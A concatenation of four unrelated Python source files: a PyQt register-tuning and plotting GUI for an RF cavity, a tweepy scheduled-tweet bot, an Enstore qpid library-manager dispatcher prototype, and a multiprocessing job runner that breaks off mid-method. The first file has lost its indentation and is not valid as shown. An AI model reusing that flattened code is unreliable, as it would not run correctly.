self.param[reg.name]=reg.value
#self.slider[index].connect(self.test1)
#print self.slider[index],index
#self.layout.addWidget(self.slider[index])
index=index+1
print self.param
self.socket = eth_test.setup_sock()
write=write_thread(self.param,self.socket)#self.sender().addr,self.sender().value)
write.start()
self.read=read_and_plot_thread(self.socket)
self.read.signal_got_new_data.connect(self.replot)
self.read.start()
def replot(self,value):
index=0
value=value.transpose()
cav=value[0,:]+1j*value[1,:]
fwd=value[2,:]+1j*value[3,:]
ref=value[4,:]+1j*value[5,:]
self.curves1[0].setData(range(value.shape[-1]),numpy.abs(cav))
self.curves1[1].setData(range(value.shape[-1]),numpy.abs(fwd))
self.curves1[2].setData(range(value.shape[-1]),numpy.abs(ref))
self.curves2[0].setData(range(value.shape[-1]),numpy.angle(cav))
self.curves2[1].setData(range(value.shape[-1]),numpy.angle(fwd))
self.curves2[2].setData(range(value.shape[-1]),numpy.angle(ref))
#print value,len(value.shape)
#if len(value.shape)==1:
# self.curves1[index].setData(range(value.shape[-1]+1),value)
#else:
# for line in value:
# #print index,line,value.shape[1]
# self.curves1[index].setData(range(value.shape[-1]),line)
# index=index+1
self.fig1.replot()
self.fig2.replot()
def __del__(self):
self.socket.close()
print 'quitting qgui'
try:
QtGui.QWidget.__del__(self)
except:
pass
#self.wait()
return
def closeEvent(self,event):
self.read.stop()
event.accept()
def test1(self):
#print self.__class__.__name__
#print obj.__class__.__name__
self.param[self.sender().name]=self.sender().value
write=write_thread(self.param,self.socket)#self.sender().addr,self.sender().value)
write.start()
return
import posix_ipc,mmap
class write_thread(QtCore.QThread):
#write_mq=posix_ipc.MessageQueue("/Write_Down",posix_ipc.O_CREAT,100)
oldumask=os.umask(0)
write_mq=posix_ipc.MessageQueue(name="/Write_Down",flags=posix_ipc.O_CREAT,mode=0666,max_messages=10,max_message_size=1500)
os.umask(oldumask)
def __init__(self,param,socket):#,addr,value):
QtCore.QThread.__init__(self)
print param
self.socket=socket
[self.regs,err_cnt]=paramhg.gen_reg_list(**param)
print 'regs size',len(self.regs)
self.addr=[reg.addr for reg in self.regs]
self.value=[reg.value for reg in self.regs]
#self.strs=[reg.print_regs() for reg in self.regs]
self.p=eth_test.mem_gate_write_prep(self.addr,self.value)
#print '\n'.join(strs)
#self.addr=addr
#self.value=value
def __del__(self):
print 'quitting write thread'
try:
QtCore.QThread.__del__(self)
self.write_mq.close()
self.write_mq.unlink()
except:
pass
self.wait()
#return
def run(self):
#print 'write to hardware',self.strs
try:
print 'message size',len(self.p),self.write_mq.max_message_size
self.write_mq.send(self.p,1,2)
except Exception as inst:
print type(inst)
print inst.args
print inst
#eth_test.mem_gate_write(self.socket,addr,value)
return
#self.terminate()
class read_and_plot_thread(QtCore.QThread):
signal_got_new_data=QtCore.pyqtSignal(numpy.ndarray)
oldumask=os.umask(0)
exit_mq=posix_ipc.MessageQueue(name="/Exit_Up",flags=posix_ipc.O_CREAT,mode=0666,max_messages=10,max_message_size=1500)
os.umask(oldumask)
def __init__(self,socket):
QtCore.QThread.__init__(self)
self.cont=True
#rom=eth_test.mem_gate_read(s,range(0,32))
#eth_test.decode_lbnl_rom(rom)
#self.fig=plt.figure(1)
#self.fig.show()
self.socket=socket
self.addr=[]
self.value=[]
self.rewrite_lock=False
self.data_array=[]
self.index=0
try:
self.memUp=posix_ipc.SharedMemory('Up')
except:
#self.memUp_thread=threading.Thread(target=read_from_hardware)
#self.memUp_thread.start()
os.system('python data.py &')
time.sleep(2)
self.memUp=posix_ipc.SharedMemory('Up')
self.mfUp=mmap.mmap(self.memUp.fd,self.memUp.size)
#def rewrite(self,addr,value):
# self.addr=addr
# self.value=value
# self.rewrite_lock=True
# return
def __del__(self):
#print self.memUp_thread.isAlive()
self.exit_mq.send('Exit_Up')
print 'quitting read thread, message sent'
try:
self.exit_mq.close()
self.exit_mq.unlink()
self.memUp.unlink()
QtCore.QThread.__del__(self)
except:
pass
return
#self.wait()
def stop(self):
print 'quit read'
self.cont=False
def get_new_data(self):
#res=eth_test.read_mem_buf(self.socket)
self.mfUp.seek(0)
res_str=self.mfUp.read(self.memUp.size)
res=struct.unpack('!%dI'%((len(res_str))/4),res_str)
self.index=self.index+1
self.data_array=numpy.array([x-65536 if x>32767 else x for x in res]).reshape([-1,8])
#self.data_array=numpy.array(res).reshape([-1,8])
#numpy.array([range(self.index,self.index+8),range(3,11)])
def run(self):
while (self.cont):
self.get_new_data()
self.signal_got_new_data.emit(self.data_array)
time.sleep(0.1) # artificial time delay
self.terminate()
#print res[1,:]
#print self.rewrite_lock
#print eth_test.mem_gate_write(self.socket,self.addr,self.value)
#eth_test.mem_gate_write(s,addr,value);
# if self.rewrite_lock:
# self.rewrite_lock=False
# else:
# numpy.savetxt("live%d.dat"%fcnt,res,'%6.0f')
# fcnt += 1
# plt.plot(res)
# self.fig.canvas.draw()
# time.sleep(0.1)
# self.fig.clf()
# print 'read and plot thread'
#return
class QELabel(QtGui.QLabel):
    # QLabel that emits a 'clicked()' signal on mouse release.

    def __init__(self, parent):
        QtGui.QLabel.__init__(self, parent)

    def mouseReleaseEvent(self, ev):
        self.emit(QtCore.SIGNAL('clicked()'))
class label_slider_value(QtGui.QWidget):
    # Composite widget: clickable label + horizontal slider + editable value
    # box, all kept in sync; emits 'value_changed' on every update.

    def __init__(self, diag, name, process=None, init=0, s_min=0, s_max=100,
                 x0=0, y0=0, dx=100, dy=30, mode=0):
        QtGui.QWidget.__init__(self)
        self.label = QELabel(diag)
        self.label.setText(name)
        self.sld = QtGui.QSlider(QtCore.Qt.Horizontal, diag)
        self.sld.setFocusPolicy(QtCore.Qt.NoFocus)
        self.sld.setMinimum(s_min)
        self.sld.setMaximum(s_max)
        self.value = (0 if init == None else init)
        self.sld.setValue(self.value)
        self.edit = QtGui.QLineEdit(diag)
        self.update_value()
        self.sld.valueChanged.connect(self.sld_changed)
        self.edit.textChanged.connect(self.text_changed)
        if process:
            # Forward our value_changed signal to the caller's handler
            self.connect(self, QtCore.SIGNAL('value_changed'), process)
        if (mode == 0):
            # Horizontal layout: label | slider | value box
            # NOTE(review): scope of this block reconstructed — original
            # indentation was lost; confirm geometry lines belong inside.
            xlabel = x0; ylabel = y0; dxlabel = dx; dylabel = dy
            xslider = x0 + dx; yslider = y0; dxslider = dx; dyslider = dy
            xvalue = x0 + dx + dx; yvalue = y0; dxvalue = dx; dyvalue = dy
            self.label.setGeometry(xlabel, ylabel, dxlabel, dylabel)
            self.sld.setGeometry(xslider, yslider, dxslider, dyslider)
            self.edit.setGeometry(xvalue, yvalue, dxvalue, dyvalue)
            self.xymax = [min(xlabel, xslider, xvalue),
                          max(ylabel, yslider, yvalue) + dy]
        self.sld.sliderPressed.connect(self.press)
        self.label.connect(self.label, QtCore.SIGNAL('clicked()'),
                           self.buttonClicked)

    def send_sig(self):
        self.emit(QtCore.SIGNAL('value_changed'))

    def text_changed(self):
        self.value = float(self.edit.text())
        self.update_value()

    def sld_changed(self):
        self.value = float(self.sld.value())
        self.update_value()

    def update_value(self):
        # Mirror self.value into both widgets, then notify listeners
        self.edit.setText(str(self.value))
        self.sld.setValue(self.value)
        self.send_sig()

    def get_xymax(self):
        return self.xymax

    def setValue(self, value):
        self.sld.setValue(value)

    def press(self):
        self.sld.setFocus()

    def buttonClicked(self):
        self.sld.setFocus()
class param_slider(label_slider_value):
    # label_slider_value that also remembers the register name it controls,
    # so qgui.test1 can read sender().name / sender().value.

    def __init__(self, diag, name, process=None, init=0, s_min=0, s_max=100,
                 x0=0, y0=0, dx=100, dy=30, mode=0):
        label_slider_value.__init__(self, diag, name, process, init,
                                    s_min, s_max, x0, y0, dx, dy, mode)
        self.name = name
        self.value = init
class params():
    # Simple record describing one tunable register parameter:
    # its name, nominal (initial) value, and allowed range.

    def __init__(self, name, nominal, min_value, max_value):
        self.value = nominal
        self.min_value = min_value
        self.max_value = max_value
        self.name = name
if __name__=='__main__':
par=[params('mode1_foffset',0,-1e4,1e4),
params('mode1_Q1',8.1e4,4.4e4,8.9e4),
params('mmode1_freq',30e3,10e3,40e3),
params('mmode1_Q',5.0,2,10),
#params('net1_coupling',100,0,200),
#params('net2_coupling',200,0,200),
#params('net3_coupling',150,0,200),
params('fwd_phase_shift',0,-180,180),
params('rfl_phase_shift',0,-180,180),
params('cav_phase_shift',0,-180,180),
params('PRNG_en',1,0,1),
params('sel_en',1,0,1),
params('ph_offset',-13000,-131072,131071), # -13300 ?
params('amp_max',10000,10,32767),
params('set_X',20000,0,32767),
params('set_P',0,-131072,131071),
params('k_PA',-200,-1000,0),
params('k_PP',-200,-1000,0),
params('maxq',0,0,12000),
params('duration',2000,1,8200),
params('piezo_dc',-900,-32768,32767) # -1400 ?
]
#regs={'t1':{'name':'t1','addr':1,'value':3},
#'t2':{'name':'t1','addr':2,'value':3},
#'t3':{'name':'t1','addr':3,'value':3},
#'t4':{'name':'t1','addr':4,'value':3},
#'t5':{'name':'t1','addr':5,'value':3},
#'t6':{'name':'t1','addr':6,'value':3}}
app=QtGui.QApplication(sys.argv)
test=qgui(par)
test.show()
print 'here'
app.exec_()
|
bot.py | ''' Module main class '''
import os
import logging
import datetime
import json
from time import sleep
from threading import Thread
from shutil import copyfile
from tweepy import API, StreamListener
from .file_io import LoadFromFile
from .config import Config
from .flags import BotFunctions, BotEvents
from .logs import log, log_setup
class TweetFeeder(StreamListener):
    """
    Dual-threaded bot to post tweets periodically,
    to track the tweets' performance, and to send alerts
    to / take commands from a master Twitter account.
    """
    def __init__(self, functionality=BotFunctions(), config=Config()):
        """
        Create a TweetFeeder bot,
        acquire authorization from Twitter (or run offline).

        :param functionality: BotFunctions flags selecting which features run
        :param config: Config providing filenames, credentials and tweet times
        """
        log_setup(
            True,
            config.filenames['log'] if (
                BotFunctions.LogToFile in functionality
            ) else "",
            TweetFeeder.LogSender(self.send_dummy_dm) if (
                BotFunctions.SendAlerts in functionality
            ) else None
        )
        self.functionality = functionality
        log(
            BotEvents.SYS.Setup,
            "{:-^80}".format(str(functionality) if functionality else "Offline testing")
        )
        self.config = config
        self.api = API(config.authorization)
        # BUGFIX: the unbound base-class call must receive this listener as
        # `self`; the previous StreamListener.__init__(self.api) passed the
        # API object as `self`, so the listener base was never initialized.
        StreamListener.__init__(self, self.api)
        if(
            BotFunctions.TweetOffline in functionality or
            BotFunctions.TweetOnline in functionality
        ):
            self.running = True
            self._start_tweeting()
    class LogSender:
        """
        Acts as a delegate container so that the logger module
        can send log output over Twitter to the master account.
        """
        def __init__(self, send_method):
            ''' Attach the send_method that will be called for write() '''
            self.send_method = send_method
        def write(self, text):
            ''' If the text is substantial, forward it '''
            if len(text) > 1: #This prevents unnecessary terminators from being sent
                self.send_method(text)
    def send_dummy_dm(self, text):
        ''' Temporary implementation for sending logs over Twitter '''
        self.api.send_direct_message(user=self.config.master_id, text=text)
    def on_connect(self):
        """Called once connected to streaming server.
        This will be invoked once a successful response
        is received from the server. Allows the listener
        to perform some work prior to entering the read loop.
        """
        log(BotEvents.SYS.ThreadStart, "Streaming")
    def on_direct_message(self, status):
        """ Called when a new direct message arrives; logs DMs from others. """
        try:
            if status.direct_message['sender_id'] != self.config.my_id:
                log(
                    BotEvents.NET.GetDM, "{}: {}".format(
                        status.direct_message['sender_screen_name'],
                        status.direct_message['text']
                    )
                )
            return True
        except Exception as my_event:
            # Narrowed from BaseException so KeyboardInterrupt/SystemExit
            # are no longer swallowed here.
            log(BotEvents.DBG.Warn, str(my_event))
    def on_event(self, status):
        """ Called when a new event arrives.
        This responds to "favorite" and "quoted_tweet."
        """
        if status.event == "favorite": #This tends to come in delayed bunches
            log(
                BotEvents.NET.GetFavorite,
                "{}: {}".format(
                    status.source.screen_name,
                    status.target_object.id
                )
            )
        elif status.event == "quoted_tweet":
            log(
                BotEvents.NET.GetQuoteRetweet,
                "{}: {}".format(
                    status.source['screen_name'],
                    status.target_object['text']
                )
            )
        elif status.event == "unfavorite":
            pass #feed tracking only requires updating tweet stats based on current totals
        else:
            log(BotEvents.NET.GetUnknown, "on_event: " + status.event)
    def on_status(self, status):
        """ Called when a new status arrives. """
        if hasattr(status, 'retweeted_status'):
            log(
                BotEvents.NET.GetRetweet,
                "{}: {}".format(
                    status.user.screen_name,
                    status.retweeted_status.id
                )
            )
        elif status.is_quote_status:
            pass #Ignore; this will be picked up by on_event
        elif status.in_reply_to_user_id == self.config.my_id:
            log(
                BotEvents.NET.GetReply,
                "{}: {}".format(
                    status.author.screen_name,
                    status.text
                )
            )
        elif status.author.id == self.config.my_id and not status.in_reply_to_user_id:
            log(BotEvents.NET.SendTweet, status.id)
            #TODO: Register tweet in feed_tracking.json
        else:
            log(
                BotEvents.NET.GetUnknown,
                "on_status: " + str(status)
            )
    def on_disconnect(self, notice):
        """ Called when Twitter submits an error """
        log(BotEvents.SYS.ThreadStop, "Streaming: " + notice)
        self.running = False
    def get_next_tweet_datetime(self):
        """ Gets the next datetime at which tweeting will occur. """
        # Supply immediate times if no tweet times and tweeting offline
        if not self.config.tweet_times and BotFunctions.TweetOffline in self.functionality:
            return (
                datetime.datetime.now() +
                datetime.timedelta(seconds=self.config.min_tweet_delay*0.2)
            )
        # Offline or not, if there are tweet times, use them
        if self.config.tweet_times:
            final_time = self.config.tweet_times[-1]
            now_t = datetime.datetime.now()
            next_t = now_t.replace(
                hour=final_time[0],
                minute=final_time[1],
                second=0,
                microsecond=0)
            if now_t > next_t: #The final time lies before the current
                next_t = next_t + datetime.timedelta(days=1)
            for tweet_time in self.config.tweet_times:
                # Pick apart the (hour, minute) tuple, put it in next_t
                next_t = next_t.replace(hour=tweet_time[0], minute=tweet_time[1])
                if now_t < next_t: # If next_t is in the future
                    return next_t.replace(second=0)
        #Failure
        return None
    def update_feed_index(self, index):
        """ Wrapper for _save_tweet_data; updates feed index """
        self._save_tweet_data(index=index)
    def update_tweet_stats(self, tweet):
        """ Wrapper for _save_tweet_data; updates tweet stats """
        self._save_tweet_data(tweet=tweet)
    def _save_tweet_data(self, index=0, tweet=None):
        """ Saves the current feed index and altered tweet stats. """
        all_tweet_data = dict()
        #Prepare all_tweet_data; attempt to load existing data
        if os.path.exists(self.config.filenames['stats']): #Load existing data
            with open(self.config.filenames['stats'], 'r', encoding="utf8") as infile:
                all_tweet_data = json.load(infile)
            copyfile(self.config.filenames['stats'], self.config.filenames['stats'] + ".bak")
        else:
            all_tweet_data = {"feed_index": 0}
        #Edit all_tweet_data
        if BotFunctions.SaveTweetIndex in self.functionality and index > 0:
            all_tweet_data['feed_index'] = index
        if BotFunctions.SaveTweetStats in self.functionality and tweet:
            if tweet.author.id == self.config.my_id: #Bot tweeted this
                # BUGFIX: create the intermediate dicts so a fresh stats file
                # (or an unseen tweet id) no longer raises KeyError.
                stats = all_tweet_data.setdefault('tweet_stats', {})
                stats.setdefault(tweet.id, {})['title'] = tweet.title
        #Save all_tweet_data to config.filenames['stats']
        with open(self.config.filenames['stats'], 'w', encoding="utf8") as outfile:
            json.dump(all_tweet_data, outfile)
    def _start_tweeting(self):
        """ Begin normal functionality loop. """
        log(BotEvents.SYS.ThreadStart, "Tweet loop")
        self._tweet_thread = Thread(target=self._tweet_loop)
        self._tweet_thread.start()
    def _tweet_loop(self):
        """ Loop for tweeting, while the stream is open. """
        next_index = LoadFromFile.load_last_feed_index(self.config.filenames['stats'])
        while self.running:
            # Get next tweet(s) ready
            next_tweets, feed_length = (
                LoadFromFile.tweets_at(next_index, self.config.filenames['feed'])
            )
            next_index += 1
            if not next_tweets:
                log(BotEvents.SYS.ThreadStop, "Tweet loop: tweets_at() failed")
                self.running = False
                break
            # Sleep until time in config
            next_time = self.get_next_tweet_datetime()
            if next_time:
                delta = next_time - datetime.datetime.now()
            else:
                log(BotEvents.SYS.ThreadStop, "Tweet loop: get_next_tweet_datetime() failed")
                self.running = False
                break
            print("Wait for {} seconds".format(delta.total_seconds()))
            sleep(delta.total_seconds()) # > WAIT FOR NEXT TWEET TIME <<<<<<<<<<<<<<<<<<<<<<<<<<
            log_str = "{} tweet{} starting at {} ({})".format(
                len(next_tweets),
                's' if (len(next_tweets) > 1) else '',
                next_index,
                next_tweets[-1]['title']
            )
            log(BotEvents.SYS.LoadTweet, log_str)
            print(log_str)
            # Submit each tweet in chain (or just one, if not a chain)
            if BotFunctions.TweetOnline in self.functionality:
                for tweet in next_tweets:
                    self.api.update_status(
                        '{}\n{} of {}'.format(tweet['text'], next_index, feed_length)
                    )
                    # NOTE(review): combined with the increment above, a chain
                    # of k tweets advances the index by k+1 — confirm against
                    # LoadFromFile.tweets_at's indexing contract.
                    next_index += 1
                    # BUGFIX: min_tweet_delay is used as a plain number of
                    # seconds in get_next_tweet_datetime(); the previous
                    # .TWEET_DELAY attribute access raised AttributeError
                    # after the first online tweet.
                    sleep(self.config.min_tweet_delay)
            self.update_feed_index(next_index)
        # Running loop ended
        log(BotEvents.SYS.ThreadStop, "Tweet loop ended.")
|
lmd.py | #!/usr/bin/env python
##############################################################################
#
# $Id$
##############################################################################
'''
LMD - python prototype for Enstore File Cache Library Manager Dispatcher core functionality implementation
'''
# system imports
import sys
import time
import types
from multiprocessing import Process
# qpid / amqp
import qpid.messaging
import Queue
# enstore imports
import e_errors
import enstore_constants
# enstore cache imports
#from cache.messaging.client import EnQpidClient
import cache.messaging.client as cmc
debug = True
class LMD():
    '''
    Library Manager Dispatcher (LMD) prototype.

    Fetches encp tickets from a qpid/AMQP queue, decides whether the request
    should be redirected to a disk-cache Library Manager, and sends the
    (possibly modified) ticket back to the requester as a reply.
    '''
    def __init__(self, amq_broker=("localhost",5672), myaddr="lmd", target="lmd_out", auto_ack=True ):
        '''
        Constructor.

        :param amq_broker: (host, port) of the AMQP broker
        :param myaddr: queue address this dispatcher reads tickets from
        :param target: queue address replies are sent to
        :param auto_ack: stored but not consulted; acknowledgements are sent
            explicitly in serve_qpid() via _ack_enstore_ticket()
        '''
        self.shutdown = False
        self.finished = False
        self.myaddr = myaddr
        self.target = target
        if debug: print "DEBUG lmd _init myaddr %s target %s"%(self.myaddr, self.target)
        self.qpid_client = cmc.EnQpidClient(amq_broker, self.myaddr, self.target)
        self.auto_ack = auto_ack
    def _fetch_enstore_ticket(self):
        # Fetch one ticket from the receive queue.
        # Returns None when the queue is empty or the receiver errors out.
        try:
            return self.qpid_client.rcv.fetch()
        except Queue.Empty:
            return None
        except qpid.messaging.ReceiverError, e:
            print "LMD: lmd _fetch_enstore_ticket() error: %s" % e
            return None
    def _ack_enstore_ticket(self, msg):
        # Acknowledge a processed message so the broker will not redeliver it.
        # Best-effort: any failure is logged (when debug) and ignored.
        try:
            if debug: print "DEBUG lmd _ack_enstore_ticket(): sending acknowledge"
            self.qpid_client.ssn.acknowledge(msg)
        except:
            exc, emsg = sys.exc_info()[:2]
            if debug: print "DEBUG lmd _ack_enstore_ticket(): Can not send auto acknowledge for the message. Exception e=%s msg=%s" % (str(exc), str(emsg))
            pass
    ##############################################################################
    # Ticket Processing logic
    #
    # Known tape libraries (reference list; not consulted by lmd_decision below).
    libs = [ "9940",
             "CD-9940B",
             "CD-LTO3",
             "CD-LTO3_test",
             "CD-LTO3_test1",
             "CD-LTO4F1",
             "CD-LTO4F1T",
             "CD-LTO4G1E",
             "CD-LTO4G1T",
             "TST-9940B",
             "null1" ]
    def lmd_decision(self, ticket):
        # Apply the redirection policy to one encp ticket and return the
        # (possibly modified) ticket with a 'status' field set.
        KB=enstore_constants.KB
        MB=enstore_constants.MB
        GB=enstore_constants.GB
        result = ticket
        if type(ticket) != types.DictType:
            if debug: print "DEBUG lmd serve_qpid() - ticket is not dictionary type, ticket %s." % (ticket)
            result['status'] = (e_errors.LMD_WRONG_TICKET_FORMAT, 'LMD: ticket is not dictionary type')
            return result
        try:
            # `d` tracks the last field looked up so the except-branch can
            # report which key was missing.
            # file_size_vc = ticket['file_size'] # which one?
            d = 'fc.size'
            file_size = ticket['wrapper'].get('size_bytes',0L)
            d = 'work'
            work = ticket['work']
            d = 'vc'
            vc = ticket['vc']
            d = 'vc.library'
            library = vc['library']
            d = 'vc.file_family'
            file_family = vc['file_family']
            d = 'vc.storage_group'
            storage_group = vc['storage_group']
        except:
            if debug:
                print "DEBUG lmd serve_qpid() - encp ticket bad format, ticket %s." % (ticket)
                print "DEBUG lmd serve_qpid() d %s %s"%(type(d), d)
            result['status'] = (e_errors.LMD_WRONG_TICKET_FORMAT,"LMD: can't get required fields, %s" % d)
            return result
        #
        # Policy example.
        # For short files redirect library to cache Library Manager
        #
        try:
            newlib = None
            if work == 'write_to_hsm' :
                if file_size < 300*MB :
                    if library == 'CD-LTO4F1T' :
                        newlib = 'diskSF'
                    elif library == 'LTO3' :
                        newlib = 'diskSF'
                    elif library == 'LTO5' :
                        newlib = 'diskSF'
                    elif storage_group == 'minos' :
                        newlib = 'diskSF'
            if work == 'read_from_hsm' :
                if library == 'LTO3' :
                    newlib = 'diskSF'
            if newlib != None :
                # store original VC library in reply
                result['original_library'] = result['vc']['library']
                result['vc']['library'] = newlib
                result['vc']['wrapper'] = "null" # if file gets written to disk, its wrapper must be null
        except:
            exc, msg, tb = sys.exc_info()
            if debug: print "DEBUG lmd serve_qpid() - exception %s %s" % (exc, msg)
            if debug: print "DEBUG lmd serve_qpid() - newlib %s" % (newlib)
            if debug: print "DEBUG lmd serve_qpid() - result['vc']['library'] %s" % (result['vc']['library'])
            result['status'] = (e_errors.LMD_WRONG_TICKET_FORMAT,"LMD: can't set library")
        # NOTE(review): this unconditionally overwrites the error status set in
        # the except-branch above with OK — it looks like it should only run on
        # the success path; confirm the intended behavior.
        result['status'] = (e_errors.OK, None)
        return result
    ##############################################################################
    def serve_qpid(self):
        """
        read qpid messages from queue
        """
        # Main dispatch loop: fetch ticket -> decide -> reply -> acknowledge.
        # Runs until self.shutdown is set (see stop()).
        self.qpid_client.start()
        try:
            while not self.shutdown:
                # Fetch message from qpid queue
                message = self._fetch_enstore_ticket()
                if not message:
                    continue
                if debug: print "DEBUG lmd serve_qpid() - got encp message=%s" %(message,)
                ticket = message.content
                ##################
                # Process ticket #
                ##################
                reply = None
                try:
                    if debug: print "DEBUG lmd serve_qpid() - received message, ticket %s." % (ticket)
                    result = self.lmd_decision(ticket)
                    if debug: print "DEBUG lmd serve_udp() : result =%s" % (result)
                    reply = qpid.messaging.Message(result, correlation_id=message.correlation_id )
                except:
                    # @todo - report error
                    print "lmd: ERROR - can not process message, original message = %s" % (message)
                if debug: print "DEBUG lmd serve_udp() : reply =%s" % (reply)
                # send reply to encp
                try:
                    if reply :
                        self.qpid_client.send(reply)
                        if debug: print "DEBUG lmd serve_udp() : reply sent, msg=%s" % (reply)
                except qpid.messaging.SendError, e:
                    if debug: print "DEBUG lmd serve_udp() : sending reply, error=", e
                    continue
                # Acknowledge ORIGINAL ticket so we will not get it again
                self._ack_enstore_ticket(message)
            # try / while
        finally:
            self.qpid_client.stop()
    def start(self):
        # start server in separate process (we may add more processes reading the same queue)
        self.qpid_proc = Process(target=self.serve_qpid)
        self.qpid_proc.start()
    def stop(self):
        # tell serving thread to stop and wait until it finish
        # NOTE(review): self.shutdown is set in the parent process; the child
        # process has its own copy, so termination relies on qpid_client.stop()
        # breaking the fetch loop — confirm.
        self.shutdown = True
        self.qpid_client.stop()
        self.qpid_proc.join()
if __name__ == "__main__":
    # test unit
    # instantiate LMD server
    queue_in = "udp_relay_test"
    #queue_out = "udp2amq_131.225.13.37_7700" # set it once for all messages
    queue_out = "udp2amq_131.225.13.37_7710" # set it once for all messages
    lmd = LMD(myaddr=queue_in, target=queue_out)
    lmd.start()
    # stop lmd server if there was keyboard interrupt
    # NOTE(review): lmd.finished is never set True anywhere in this file, so
    # this loop only ends via KeyboardInterrupt.
    while not lmd.finished :
        try:
            time.sleep(1)
        except KeyboardInterrupt:
            print "Keyboard interrupt at main thread"
            lmd.stop()
            break
    del lmd
    print "lmd finished"
|
mrun.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Seaky
# @Date: 2019/4/20 14:44
import queue
import time
import traceback
from collections import OrderedDict
from multiprocessing import Process, Manager
from random import randint
from ..data.mysql import MyModel
from ..data.mysql import new_session
from ..func.base import MyClass, catch_exception
from ..func.parser import ArgParseClass
from ..os.info import get_caller
from ..os.oper import dump_data, load_data
class MultiRun(MyClass):
    """
    Run one worker function over a list of kwargs dicts, optionally across
    multiple processes, with retry, timing and result-persistence support.
    """
    def __init__(self, func, func_kws, process_num=5, func_common_kw=None, func_common_kw_with_obj=None,
                 process_db_session_enable=False, process_db_session_kw=None, show_process=False, show_job_result=False,
                 mark_start_time=False, add_log_to_common_kw=True, **kwargs):
        '''
        :param func: worker function; must return (status, result)
        :param func_kws: list of kwargs dicts, one per job
        :param process_num: number of worker processes; mind the database
            connection limit when jobs open DB connections
        :param func_common_kw: kwargs shared by every job; must stay picklable
            (no log objects etc.)
        :param func_common_kw_with_obj: shared kwargs that may hold objects
            (e.g. a logger); kept separate because objects cannot be dumped
        :param process_db_session_enable: each process creates one db_session
            and passes it to its jobs, instead of every job creating its own
        :param process_db_session_kw: kwargs to create that session, e.g.
            {'conn_str': ''}
        :param show_process: print process-level debug output
        :param show_job_result: log every job's result
        :param mark_start_time: pass start_time into jobs for time accounting
        :param add_log_to_common_kw: inject self.log into
            func_common_kw_with_obj when absent
        :return
        '''
        MyClass.__init__(self, **kwargs)
        self.func = func
        assert isinstance(func_kws, list), 'func_kws is not a list.'
        self.func_kws = func_kws
        self.func_common_kw = {} if func_common_kw is None else func_common_kw
        self.func_common_kw_with_obj = {} if func_common_kw_with_obj is None else func_common_kw_with_obj
        # BUGFIX: the previous conditional expression returned process_num in
        # both branches; assign it directly.
        self.control['process_num'] = process_num
        self.control['process_db_session_enable'] = process_db_session_enable
        self.control['process_db_session_kw'] = process_db_session_kw
        self.control['show_process'] = show_process
        self.control['show_job_result'] = show_job_result
        self.control['mark_start_time'] = mark_start_time
        self.stat = {'miss': 0, 'success': 0, 'fail': 0, 'total': len(self.func_kws), 'timer': {}}
        if add_log_to_common_kw and 'log' not in self.func_common_kw_with_obj:
            self.func_common_kw_with_obj['log'] = self.log
        self.cache['timer_retry'] = []
    def before_run(self):
        """ Reset the working job list to the full set of job kwargs. """
        self.func_kws_now = self.func_kws
    def job(self, process_i, inline=False):
        """
        Worker loop executed in each process (or inline in the caller).

        Pulls job dicts from self.q_input until exhausted, calls self.func
        with the merged kwargs, and pushes the annotated job dict to
        self.q_output.

        :param process_i: 1-based worker index, used in debug output
        :param inline: when True, iterate self.q_input as a plain list in the
            current process instead of reading the multiprocessing queue
        """
        self.show_process_debug('process {} start.'.format(process_i))
        if self.default('process_db_session_enable') and self.default('process_db_session_kw'):
            db_session = new_session(**self.default('process_db_session_kw'))
            self.show_process_debug('process {} create data session {}.'.format(process_i, db_session))
        else:
            db_session = None
        i = 0
        while True:
            try:
                start_time = time.time()
                if not inline:
                    v = self.q_input.get_nowait()
                else:
                    v = self.q_input[i]
                    i += 1
                self.show_process_debug('process {} get {} job, kwarg: {}'.format(process_i, v['order_in'], v['kw']))
                if db_session:
                    self.func_common_kw_with_obj.update({'db_session': db_session})
                st = {'start_time': start_time} if self.default('mark_start_time') else {}
                self.timer[v['idx']] = start_time
                try:
                    is_ok, result = self.func(**v['kw'], **self.func_common_kw_with_obj, **st)
                except Exception as e:
                    # A failing job is recorded, not fatal to the worker.
                    self.log.info(traceback.format_exc())
                    is_ok, result = False, str(e)
                elapsed_time = round(time.time() - start_time, 2)
                v.update({'is_ok': is_ok, 'result': result, 'timer': elapsed_time})
                if self.default('show_job_result'):
                    _log = self.log.info if is_ok else self.log.error
                    _log('{} | time: {}'.format(result, elapsed_time))
                self.show_process_debug('process {} do {} job done. result: {}'.format(process_i, v['order_in'],
                                                                                       {'is_ok': is_ok,
                                                                                        'result': result}))
                if not inline:
                    self.q_output.put(v)
                else:
                    self.q_output.append(v)
            except queue.Empty:
                # Multiprocessing input queue drained: worker is done.
                break
            except IndexError:
                # Inline input list exhausted: worker is done.
                break
            except Exception as e:
                self.log.info(traceback.format_exc())
                break
        if db_session:
            db_session.close()
        self.show_process_debug('process {} end.'.format(process_i))
    @catch_exception()
    def run(self, mrun_load=False, mrun_save=True, retry_fail=0, func_retry_skip=None, func_change=None,
            load_fail_result=False, show_stats=True, inline=False, process_timeout=None, *args, **kwargs):
        '''
        :param mrun_load: load previously saved results instead of running
        :param mrun_save: save results to the json result file
        :param retry_fail: number of times to retry failed results
        :param func_retry_skip: if callable, a failed result is retried only
            when it returns False for that result; None retries all failures
        :param func_change: optional callable to adjust a failed job's kwargs
            before the retry
        :param load_fail_result: load previous results and retry the failures
        :param show_stats: log a summary when done
        :param inline: run single-process
        :param process_timeout: per-process join timeout in seconds
        :param args:
        :param kwargs:
        :return: (is_ok, results)
        '''
        self.control['inline'] = inline
        self.control['process_timeout'] = process_timeout
        self.cache['start_time'] = time.time()
        assert isinstance(retry_fail, int), 'retry_fail must be int.'
        result_path = self.path_temp / '{}_mrun_result.json'.format(get_caller().stem)
        if mrun_load and result_path.exists():
            is_ok, results = load_data(result_path)
        elif load_fail_result and result_path.exists():
            is_ok, results = load_data(result_path)
            self.log.info('load results from {} .'.format(result_path))
            self.func_kws = [x['kw'] for x in results]
            self.func_kws_now = self.func_kws
            if retry_fail < 1:
                retry_fail = 1
        else:
            self.func_kws_now = self.func_kws
            is_ok, results = self.run_real(inline=inline, process_timeout=process_timeout, *args, **kwargs)
        assert is_ok, results
        # Retry failed jobs up to retry_fail times.
        i = 0
        _results = results
        while i < retry_fail:
            i += 1
            fails = []
            for j, x in enumerate(_results):
                if x['is_ok']:
                    continue
                if hasattr(func_retry_skip, '__call__') and func_retry_skip(x):
                    continue
                if func_change and hasattr(func_change, '__call__'):
